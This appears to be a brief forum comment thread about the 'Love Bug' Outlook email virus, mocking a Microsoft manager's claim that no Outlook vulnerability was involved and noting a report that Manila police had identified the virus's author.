Quote from Microsoft

[wowbagger (69688)]

This is a real quote from Scott Culp, program manager for Microsoft's security response center"

In this case the virus author chose to target Outlook probably because it gave him better reach. There isn't a security
vulnerability in Outlook involved in this at all.

I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.

I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.

Love Bytes, Love Stings?

[BaronCarlos (34713)]

According to this UPI Article [vny.com], Manilla Police have identified the Author.
Of course, this could mean an arrest in 24 hours.
*Carlos: Exit Stage Right*

"Geeks, Where would you be without them?"